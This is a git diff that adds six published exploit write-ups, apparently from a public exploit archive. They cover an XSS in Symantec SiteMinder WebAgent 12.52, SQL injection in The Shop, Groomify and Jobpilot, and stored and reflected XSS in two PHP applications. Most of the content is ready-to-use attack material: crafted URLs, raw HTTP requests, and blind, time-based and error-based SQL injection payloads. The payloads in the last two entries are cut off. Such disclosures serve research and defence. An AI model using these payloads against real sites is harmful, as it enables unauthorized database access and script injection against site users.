diff --git a/exploits/hardware/webapps/51530.txt b/exploits/hardware/webapps/51530.txt
new file mode 100644
index 000000000..2e81942bd
--- /dev/null
+++ b/exploits/hardware/webapps/51530.txt
@@ -0,0 +1,45 @@
+Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
+Google Dork: N/A
+Date: 18-06-2023
+Exploit Author: Harshit Joshi
+Vendor Homepage: https://community.broadcom.com/home
+Software Link: https://www.broadcom.com/products/identity/siteminder
+Version: 12.52
+Tested on: Linux, Windows
+CVE: CVE-2023-23956
+Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221
+
+*Description:*
+I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have
+discovered in the Symantec SiteMinder WebAgent. The vulnerability is
+related to the improper handling of user input and has been assigned the
+Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this
+vulnerability is 5.4.
+
+Vulnerability Details:
+---------------------
+*Impact:*
+
+This vulnerability allows an attacker to execute arbitrary JavaScript code
+in the context of the affected application.
+
+*Steps to Reproduce:*
+
+*First:*
+
+1) Visit -
+https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
+
+2) After visiting the above URL, click on the "*Change Password*" button,
+and the popup will appear.
+- The *SMAGENTNAME *parameter is the source of this vulnerability.
+*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
+
+*Second:*
+
+1) Visit -
+https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
+2) After visiting the above URL, click on the "*Change Password*" button,
+and the popup will appear.
+- The *TARGET *parameter is the source of this vulnerability.
+*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*
\ No newline at end of file
diff --git a/exploits/php/webapps/51525.txt b/exploits/php/webapps/51525.txt
new file mode 100644
index 000000000..65005bb78
--- /dev/null
+++ b/exploits/php/webapps/51525.txt
@@ -0,0 +1,44 @@
+# Exploit Title: The Shop v2.5 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/the-shop/34858541
+# Demo Site: https://shop.activeitzone.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /api/v1/carts/add HTTP/1.1
+Content-Type: application/json
+Accept: application/json, text/plain, */*
+x-requested-with: XMLHttpRequest
+x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
+Referer: https://localhost
+Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
+the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
+Content-Length: 81
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
+
+
+### Parameter & Payloads ###
+
+Parameter: JSON qty ((custom) POST)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
+THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
+END))","temp_user_id":null}
+
+ Type: time-based blind
+ Title: MySQL > 5.0.12 OR time-based blind (heavy query)
+ Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
+2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
+INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
+C)","temp_user_id":null}
\ No newline at end of file
diff --git a/exploits/php/webapps/51526.txt b/exploits/php/webapps/51526.txt
new file mode 100644
index 000000000..d55fd52af
--- /dev/null
+++ b/exploits/php/webapps/51526.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Groomify v1.0 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
+# Demo Site: https://script.bugfinder.net/groomify
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Vulnerable URL ###
+
+https://localhost/groomify/blog-search?search=payload
+
+
+### Parameter & Payloads ###
+
+Parameter: search (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf)
+AND 'rszk'='rszk
\ No newline at end of file
diff --git a/exploits/php/webapps/51527.txt b/exploits/php/webapps/51527.txt
new file mode 100644
index 000000000..b5a9fb364
--- /dev/null
+++ b/exploits/php/webapps/51527.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Jobpilot v2.61 - SQL Injection
+# Date: 2023-06-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
+# Demo Site: https://jobpilot.templatecookie.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Parameter: long (GET)
+ Type: error-based
+ Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+ Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
+AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT
+(ELT(4894=4894,1))),0x71786b7171)) AND
+(1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
+Fire Contract Counties, California, United
+States&category=&price_min=&price_max=&tag=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766)
+AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND
+(1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL
+Fire Contract Counties, California, United
+States&category=&price_min=&price_max=&tag=
\ No newline at end of file
diff --git a/exploits/php/webapps/51528.txt b/exploits/php/webapps/51528.txt
new file mode 100644
index 000000000..e818f02be
--- /dev/null
+++ b/exploits/php/webapps/51528.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
+# Date of found: 12/05/2023
+# Exploit Author: VIVEK CHOUDHARY @sudovivek
+# Version: V1.0
+# Tested on: Windows 10
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/
+# CVE: CVE-2023-33580
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580
+
+Vulnerability Description -
+
+ The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.
+
+
+Steps to Reproduce -
+
+ The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:
+
+ 1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.
+
+ 2. Click on the "Admin" button to navigate to the admin login page.
+
+ 3. Login to the Admin account using the default credentials.
+ - Username: admin
+ - Password: Test@123
+
+ 4. Proceed to the Admin Profile page.
+
+ 5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {">}.
+
+ 6. Click on the "Submit" button.
+
+ 7. Refresh the page, and the injected payload will be executed.
+
+
+As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.
\ No newline at end of file
diff --git a/exploits/php/webapps/51529.txt b/exploits/php/webapps/51529.txt
new file mode 100644
index 000000000..d25586476
--- /dev/null
+++ b/exploits/php/webapps/51529.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
+# Exploit Author: tmrswrr / Hulya Karabag
+# Vendor Homepage: https://www.diafancms.com/
+# Version: 6.0
+# Tested on: https://demo.diafancms.com
+
+
+Description:
+
+1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
+Payload : ">